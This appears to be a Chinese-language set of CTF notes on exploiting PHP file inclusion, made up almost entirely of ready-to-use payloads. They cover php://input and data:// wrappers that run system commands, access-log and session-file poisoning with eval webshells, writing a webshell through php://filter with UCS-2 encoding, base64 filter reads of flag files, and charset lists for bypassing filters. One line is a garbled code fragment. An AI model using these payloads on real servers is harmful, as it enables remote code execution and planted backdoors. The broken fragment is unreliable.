使用命令查看
1
| ?file=php://input (包括Php绕过[大写])
|
抓包post传参
或者使用data查看
1
| ?file=data://text/plain,<?=system("ls /")?>
|
日志注入
已知日志文件所在地
1
| ?file=/var/log/nginx/access.log
|
抓包修改useragent为一句话木马
1
| <?php @eval($_REQUEST[1])?>
|
关于session文件的注入
服务器一般会将sessio文件放入
1
2
3
4
| /var/lib/php/
/var/lib/php/sessions/
/tmp/
/tmp/sessions/
|
直接在根目录下3.php使用post传参
(目前销毁session 删除tmp文件夹 过滤< 设置包含路径 都可行)
1
| <?php system("cd var/www/html;tac fl0g.php"); (类似即可)
|
data伪协议直接查看
1
| ?file=data://text/plain;base64,PD89c3lzdGVtKCd0YWMgZioucGhwJyk7 (base64编码)
|
php伪协议写入一句话木马
1
| ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=3.php
|
1
| contents=<?php @eval($_POST[jz]);?>
|
xxxxxxxxxx "|`~\\]/“,chr($a))){ echo chr($a).” “; }}?>bash
1
2
3
4
| <?php
$result = iconv("UCS-2LE","UCS-2BE", '<?php @eval($_POST[jz]);?>');
echo "payload:".$result."\n";
?>
|
filter伪协议
1
2
| ?filter=php://filter/convert.base64-encode/resource=flag.php (filter伪协议)
?filename=php://filter/convert.iconv.utf-8.UTF-16/resource=./flag.php
|
base64被过滤后的选择(集束炸弹bp爆破)
UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
